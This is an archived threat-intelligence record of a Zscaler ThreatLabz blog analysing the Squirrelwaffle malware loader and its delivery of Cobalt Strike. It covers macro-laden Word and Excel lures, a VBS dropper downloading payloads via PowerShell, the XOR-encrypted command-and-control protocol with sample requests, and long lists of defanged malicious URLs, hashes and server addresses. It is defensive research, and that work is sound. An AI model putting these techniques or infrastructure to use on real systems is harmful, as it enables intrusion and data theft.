{
	"id": "1ceb3573-7aad-4464-affc-31ac8d8757f7",
	"created_at": "2026-04-06T00:08:37.515906Z",
	"updated_at": "2026-04-10T03:24:23.612133Z",
	"deleted_at": null,
	"sha1_hash": "a2d73636602d133dc6f97a92179fcc2ed1fc12b8",
	"title": "The Squirrelwaffle: New Loader Delivers Cobalt Strikes |Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1831476,
	"plain_text": "The Squirrelwaffle: New Loader Delivers Cobalt Strikes |Blog\r\nBy Avinash Kumar, Brett Stone-Gross\r\nPublished: 2021-09-28 · Archived: 2026-04-05 21:50:38 UTC\r\nZscaler ThreatLabz has been following an emerging new malware loader known as Squirrelwaffle that is being used to\r\ndeliver Cobalt Strike. In this blog, we will be analyzing the complete attack chain for this new malware family (as shown in\r\nFigure 1). This campaign has been running since mid-September 2021. The Squirrelwaffle loader is being delivered from the\r\nsame infrastructure that was delivering the Qakbot banking trojan.\r\nAttack Chain\r\nFigure 1: Squirrelwaffle Attack Chain\r\nKey Points\r\nThe campaign started with a malicious document file delivered via spam email campaigns with embedded URLs.\r\nThe spam campaign is using an email thread hijacking technique that was previously used for Emotet and Qakbot\r\nmalware campaigns.\r\nThe malicious document contains a macro that drops and executes a VBS file in the %ProgramData% folder.\r\nThe VBS file downloads the Squirrelwaffle loader which in turn downloads another loader which further downloads\r\nCobalt Strike.\r\nNewly registered domains are used to host the loader payload.\r\nThe same infrastructure was used to deliver the Qakbot banking trojan.\r\nMalware Distribution Strategy\r\nSquirrelwaffle campaigns generally start via spam emails that attempt to convince victims to click an embedded URL using\r\na technique known as email thread hijacking. Email thread hijacking leverages emails that have been stolen prior to the\r\nattack and later repurposed to dupe a victim into believing that an email is from someone that they know who is replying to\r\nthe same thread. Once a victim clicks on the URL, a ZIP file is downloaded that contains a Microsoft Word document. These\r\ndocuments follow a similar naming convention matching the regular expression diagram-\\d{2,3}.doc.\r\nFor example, the file with an MD5 hash E599A656599A2680C9392C7329D9D519 has the filename diagram-346.doc.\r\nThis document is using a DocuSign template lure that instructs the user to enable a macro to view the content (as shown in\r\nFigure 2). All the other documents analyzed by Zscaler ThreatLabz have exactly the same content with multiple modules\r\nthat contain VBA code.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 1 of 10\n\nFigure 2: Squirrelwaffle Microsoft Word document lure containing a malicious macro\r\nOnce the user enables the macro, an AutoOpen() subroutine is called which then executes a malicious Visual Basic\r\nApplication (VBA) macro. Here, the AutoOpen() subroutine calls another function efile() in the bxh module. There is a\r\nUserForm object in the document which contains a VBS file named pin.vbs that is embedded in the caption of the DocuSign\r\nimage. The document that contains the macro code leverages cscript.exe to extract the embedded VBS file, which is written\r\nto the %ProgramData% folder, and executed using wscript.exe. This VBS file contains an obfuscated PowerShell script with\r\n5 different URLs to download the Squirrelwaffle payload as shown in Figure 3. The payload is written to %ProgramData%\r\nwith the filename ww1.dll.\r\nFigure 3: Example VBA code that drops a VBS file in the %ProgramData% folder that is used to download Squirrelwaffle\r\nThe VBS file simply uses the IEX (Invoke-Expression) function to download the Squirrelwaffle loader. The payload DLL is\r\nexecuted via rundll32.exe by invoking the export function name ldr.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 2 of 10\n\nFigure 4: Example VBS code that downloads and executes the Squirrelwaffle loader.\r\nExample (sanitized) URLs that were used to retrieve Squirrelwaffle are shown below:\r\nhxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html\r\nhxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html\r\nhxxps://bussiness-z[.]ml/ze8pCNTIkrIS/pt.html\r\nhxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html\r\nhxxps://bonus.corporatebusinessmachines[.]co.in/1Y0qVNce/pt.html\r\nFigure 5 shows the ProgramData folder after the VBS script is executed and the Squirrelwaffle payloads have been\r\ndownloaded\r\nFigure 5: Disk artifacts after the pin.vbs file has been executed and downloaded the Squirrelwaffle loader DLL.\r\nThe threat actor behind these campaigns has changed some of their TTPs over time. Recently, the initial infection vector has\r\nused hidden Microsoft Excel sheets with an Auto_Open() macro, which downloads the Squirrelwafle loader from three\r\ndifferent URLs. The Squirrelwaffle loader is subsequently executed via regsvr32.exe. An example for this campaign shown\r\nin Figure 6, used a Microsoft Excel document with the MD5 hash 77BD39191FDC817F2F14F0462BFF8D86 and a\r\nfilename matching the regular expression diagram-\\d{1,9}.xls.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 3 of 10\n\nFigure 6: Microsoft Excel with a malicious macro used to deliver Squirrelwaffle\r\nThe hidden sheet in this Excel document is shown in Figure 7.\r\nFigure 7: Excel 4.0 hidden sheet containing a malicious macro code\r\nThe extracted macro code is shown in Figure 8.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 4 of 10\n\nFigure 8: Macro code extracted from a hidden Excel sheet\r\nThe threat actor also changed the location where the payload is written to disk. Example (sanitized) URLs that were used to\r\nretrieve Squirrelwaffle from this campaign are shown below:\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html\r\nTechnical Analysis of the Payload\r\nThis analysis covers the Squirrelwaffle with the MD5 hash 479DAE0F72F4D57BD20E0BF8CB3EBDF7. Once the\r\nSquirrelwaffle payload is downloaded, it will either be executed via rundll32.exe or regsvr.exe depending upon the initial\r\ninfection vector that was used to download the payload. Squirrelwaffle loader samples have a recent compilation date using\r\nVisual Studio 2017 as shown in Figure 9.\r\nFigure 9: Squirrelwaffle compilation metadata\r\nThe Squirrelwaffle loader is a 32-bit DLL, which is packed with a custom packer. Similar packers have been observed in\r\nother malware families including Ursnif and Zloader.\r\nSquirrelwaffle contains a hardcoded configuration that is encrypted in the binary. There are two main components: a list of\r\nCnC URLs and a list of IP addresses to block, which belong to sandboxes and analysis platforms. These lists are obfuscated\r\nusing an XOR-based algorithm with hardcoded keys. An example formatted Squirrelwaffle configuration is shown in Figure\r\n10.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 5 of 10\n\nFigure 10: Formatted Squirrelwaffle configuration after decryption\r\nOnce the malware decodes all of the CnC domains and IP addresses to block, it creates a socket and sends the data using the\r\nsend() function and receives the content from the CnC using recv() calls. The CnC communication protocol utilizes an\r\nHTTP POST request with a Base64 encoded payload that is encrypted using an XOR-based algorithm with the hardcoded\r\nkey KJKLO. An example HTTP POST request is shown below:\r\nPOST /dXf4cS4GPL/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkenw= HTTP/1.1\r\nHost: test.dirigu.ro\r\nContent-Length: 76\r\neHp+fHZ7Q0ICAAUPQkUMcRYePyo5ORcrKiQ4LCkTCjo7CC4/KxceIConIiIoQkMHHw0CAhoKRkI=\r\nNote that this request does not contain a User-Agent field in the HTTP header.\r\nThe path of the HTTP POST request consists of a hardcoded prefix and a Base64 encoded string that is encrypted using the\r\nsame XOR-based algorithm and key as described above. This encoded string includes an alphanumeric string with a random\r\nlength between 1 and 28 characters followed by the IP address of the system. Each field is delimited by a single tab\r\ncharacter. An example before encryption is shown below:\r\nt2nQfj3SL3XByImciQTqVa\\t192.168.125.11\r\nThe HTTP POST body contains another Base64 encoded string that includes the victim’s computer name, username,\r\napplication data directory, and workgroup. Each field is delimited with two tab characters. An example payload before\r\nencryption is shown below:\r\nGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\r\nThis payload is also encrypted with the same XOR-based algorithm and key as the HTTP POST path component.\r\nThe SquirrelWaffle CnC responds with a Base64 encoded payload that uses the same encryption schema with another format\r\nthat uses two tab characters as delimiter between fields. These fields include a status code, a timestamp, the external IP\r\naddress of the system, along with the victim’s system information that was previously sent. An example decrypted response\r\nis shown below:\r\n200\\r\\n\\t\\t\\n\\r1631911856\\r\\n\\t\\t\\n\\r174.197.7.69\\r\\n\\t\\t\\n\\rGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\r\nThe SquirrelWaffle CnC response may also contain a second-stage payload. An example decrypted response is shown\r\nbelow:\r\n200\\r\\n\\t\\t\\n\\r1631913267\\r\\n\\t\\t\\n\\r174.197.7.69\\r\\n\\t\\t\\n\\rGEORGE-PC\\t\\tgeorge\\t\\tC:\\\\Users\\\\george\\\\AppData\\\\Roaming\\t\\tWORKGROUP\\t\\t\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rNONE\\r\\n\\t\\t\\n\\rMZ\\x90\\x00\\x03\\x00\\x00\\\r\nprogram cannot be run in DOS\r\nmode...\\x00\\x00\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\\r\\n\\t\\t\\n\\r\r\nThis second-stage payload will be written to a filename that consists of eleven random alphanumeric characters appended\r\nwith a .txt extension, and then executed by SquirrelWaffle.\r\nZscaler ThreatLabz has observed Squirrelwaffle deliver an executable file with the MD5 hash\r\n116301FD453397FDF3CB291341924147. This file is packed and decrypted in memory to produce a Cobalt Strike stager\r\nwith the MD5 hash 38DB72B33ABCEA250F5B7CB5AB514B2C, which further downloads the Cobalt Strike beacon.\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 6 of 10\n\nFigure 11 below shows interesting strings in the Cobalt Strike stager that impersonates a jQuery request. The EICAR string\r\nis likely an artifact from the threat actor using a demo version of Cobalt Strike.\r\nFigure 11: Cobalt Strike stager delivered by Squirrelwaffle with interesting strings highlighted.\r\nThe Cobalt Strike stager sends an HTTPS GET request to 213.227.154[.]92 with the path /jquery-3.3.1.slim.min.js. The\r\nCobalt Strike CnC server responds with a jQuery file with the encrypted Cobalt Strike beacon embedded as binary data in\r\nthe middle of the file as shown in Figure 12.\r\nFigure 12: Encrypted Cobalt Strike beacon embedded in jQuery code starting at offset 0xfaf.\r\nThis binary data consists of shellcode that decrypts the Cobalt Strike beacon using the XOR-based algorithm replicated\r\nbelow in Figure 13.\r\nFigure 13: Cobalt Strike beacon decryption algorithm.\r\nThe Cobalt Strike beacon observed by Zscaler ThreatLabz contains the following CnC servers:\r\nhxxps://systemmentorsec.com/jquery-3.3.1.min.js,\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 7 of 10\n\nhxxps://213.227.154.92/jquery-3.3.1.min.js\r\nCloud Sandbox Detection\r\nFigure 14: Zscaler Cloud Sandbox detection of Squirrelwaffle Loader\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels\r\nincluding the signature shown below:\r\nWin32.Downloader.Squirrelwaffle\r\nConclusion\r\nAfter the Emotet botnet takedown earlier this year, criminal threat actors are filling that void. Squirrelwaffle appears to be a\r\nnew loader taking advantage of this gap. It is not yet clear if Squirrelwaffle is developed and distributed by a known threat\r\nactor or a new group. However, similar distribution techniques were previously used by Emotet. The Zscaler ThreatLabz\r\nteam will continue to monitor this attack, as well as others, to help keep our customers safe.\r\nMITRE ATT\u0026CK TTP Mapping\r\nTactic Technique\r\nT1059 Command and Scripting Interpreter\r\nT1592 Gather Victim Host Information\r\nT1569 System Services\r\nT1137 Office Application Startup\r\nT1055 Process Injection\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1436 Commonly Used Port\r\nT1437 Standard Application Layer Protocol\r\nT1106 Native API\r\nIndicators of Compromise\r\nSquirrelwaffle ZIP archive URLs\r\nhxxp://amaimaging[.]com/voluptas-quidem/documents.zip\r\nhxxp://beautifulgist[.]com/id-alias/documents.zip\r\nhxxp://bussiness-z[.]ml/qui-quia/documents.zip\r\nhxxp://gadhwadasamaj.techofi[.]in/expedita-consequatur/documents.zip\r\nhxxp://inetworx.co[.]za/voluptate-sunt/documents.zip\r\nhxxp://insurance.akademiilmujaya[.]com/beatae-sunt/documents.zip\r\nhxxp://prevenzioneformazionelavoro[.]it/quasi-reprehenderit/documents.zip\r\nhxxp://procatodicadelacosta[.]com/neque-et/documents.zip\r\nhxxp://readgasm[.]com/repudiandae-provident/documents.zip\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 8 of 10\n\nhxxp://rinconadadellago[.]com.mx/qui-quia/documents.zip\r\nhxxp://saraviatowing[.]net/et-praesentium/documents.zip\r\nhxxp://shahanaschool[.]in/illum-accusamus/documents.zip\r\nhxxp://srv7.corpwebcontrol[.]com/np/prog_est.zip\r\nhxxp://srv7.corpwebcontrol[.]com/np/user_est.zip\r\nhxxp://stripemovired.ramfactoryarg[.]com/nostrum-ab/documents.zip\r\nhxxp://syncun[.]com/natus-aut/documents.zip\r\nhxxp://tradingview-brokers.skoconstructionng[.]com/molestiae-voluptatum/documents.zip\r\nhxxps://abogados-en-medellin[.]com/odit-error/documents.zip\r\nhxxps://amaimaging[.]com/voluptas-quidem/ducimus.zip\r\nhxxps://builtbvbh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://builtbybh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://builtybybh-com[.]gq/eum-est/voluptas.zip\r\nhxxps://cctvfiles[.]xyz/aliquam-ipsam/documents.zip\r\nhxxps://focus.focalrack[.]com/enim-rerum/ducimus.zip\r\nhxxps://inetworx.co[.]za/voluptate-sunt/est.zip\r\nhxxps://kmslogistik[.]com/repellat-et/est.zip\r\nhxxps://moeinjelveh[.]ir/et-eligendi/placeat.zip\r\nhxxps://readgasm[.]com/repudiandae-provident/voluptas.zip\r\nhxxps://saraviatowing[.]net/et-praesentium/placeat.zip\r\nhxxps://sextoystore.co[.]in/temporibus-aut/est.zip\r\nhxxps://shivrajengineering[.]in/qui-dolores/placeat.zip\r\nSquirrelwaffle Loader URLs\r\nhxxps://ghapan[.]com/Kdg73onC3oQ/090921.html\r\nhxxps://yoowi[.]net/tDzEJ8uVGwdj/130921.html\r\nhxxps://gruasingenieria[.]pe/LUS1NTVui6/090921.html\r\nhxxps://chaturanga.groopy[.]com/7SEZBnhMLW/130921.html\r\nhxxps://lotolands[.]com/JtaTAt4Ej/130921.html\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html\r\nSquirrelwaffle Word Document File MD5 Hashes\r\n326498ae163f0d6b8a863d24793f152d\r\n2156a1a8b0c579a51ea77d1bc7062b49\r\n5e9f33e5baa6d6efca91c8db78c01bd0\r\nfae4ca3c95a5068063637b2f2ed3a5b2\r\na449e5044437c453fce2ead881aa8161\r\nc27545fbb3b4ff35277bce1383655e46\r\nc774e400b46f4c0bb90c11e349bc36a0\r\nc2ed8fc614aeda36a7e3a638fa7db16a\r\ndb11964b27738bf4e3a1501e11bd54ad\r\n822e20c95df7165009600a9bfbff9b5e\r\nc1ed800a4ae9d4efd61de3aa7fd657b4\r\nb478bc389fc15e17b231984fa80e2b0d\r\ne599a656599a2680c9392c7329d9d519\r\nda48063b7d75ec645f4370b95c28675c\r\nc3bd4145feaaae541cb17ccc7cbd2e44\r\n558f97103085394c3a35c9b03839fe72\r\na07f5b21376cd2b661f36dcdc2081b75\r\n5b50f7beabcff32bd02de2dda2766a7b\r\nSquirrelwaffle VBS File MD5 Hash\r\n9da69f65ce4e8e57aef3ea1dd96f42ec\r\nSquirrelwaffle Loader MD5 Hashes\r\n7e9ba57db08f53b56715b0a8121bd839\r\n5ec89ea30af2cc38ae183d12ffacbcf7\r\na3ecc9951178447b546b004ea2dfd93f\r\n9545905ea3735dcac289eead39e3f893\r\n732ce2ef4b18042ef9e3f3e52ad59916\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 9 of 10\n\ncb905bb6a38b5d253eb64aab46eafbd7\r\nebeeef845d0d666363935da89a57b44d\r\nUnpacked DLL file MD5 Hash\r\n3ecc9ca5e744d7ddafa04834c70b95c3\r\nDomain used by the DLL for Squirrelwaffle CnC\r\n107[.]180[.]12[.]15 port 80 centralfloridaasphalt[.]com\r\n119[.]235[.]250[.]50 port 80 kmslogistik[.]com\r\n143[.]95[.]80[.]83 port 80 chaturanga[.]groopy[.]com\r\n160[.]153[.]129[.]37 port 80 mercyfoundationcio[.]org\r\n160[.]153[.]129[.]37 port 80 shoeclearanceoutlet[.]co[.]uk\r\n160[.]153[.]131[.]187 port 80 spiritofprespa[.]com\r\n166[.]62[.]28[.]139 port 80 jhehosting[.]com\r\n166[.]62[.]28[.]139 port 80 key4net[.]com\r\n166[.]62[.]28[.]139 port 80 lead[.]jhinfotech[.]co\r\n166[.]62[.]28[.]139 port 80 voip[.]voipcallhub[.]com\r\n166[.]62[.]28[.]139 port 80 voipcallhub[.]com\r\n194[.]181[.]228[.]45 port 80 bartek-lenart[.]pl\r\n194[.]181[.]228[.]45 port 80 lenartsa[.]webd[.]pro\r\n202[.]52[.]147[.]113 port 80 amjsys[.]com\r\n203[.]124[.]44[.]95 port 80 novamarketing[.]com[.]pk\r\n216[.]219[.]81[.]3 port 80 ems[.]prodigygroupindia[.]com\r\n216[.]219[.]81[.]3 port 80 hrms[.]prodigygroupindia[.]com\r\nCobalt Strike Stager MD5 Hashes\r\n116301fd453397fdf3cb291341924147\r\nef799b5261fd69b56c8b70a3d22d5120\r\nCobalt Strike CnC Servers\r\n213.227.154[.]92:443/jquery-3.3.1.min.js\r\n213.227.154[.]92:8080/jquery-3.3.1.min.js\r\nsystemmentorsec[.]com:443/jquery-3.3.1.min.js\r\nsystemmentorsec[.]com:8080/jquery-3.3.1.min.js\r\nSource: https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nhttps://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike"
	],
	"report_names": [
		"squirrelwaffle-new-loader-delivering-cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434117,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.pdf",
		"text": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.txt",
		"img": "https://archive.orkl.eu/a2d73636602d133dc6f97a92179fcc2ed1fc12b8.jpg"
	}
}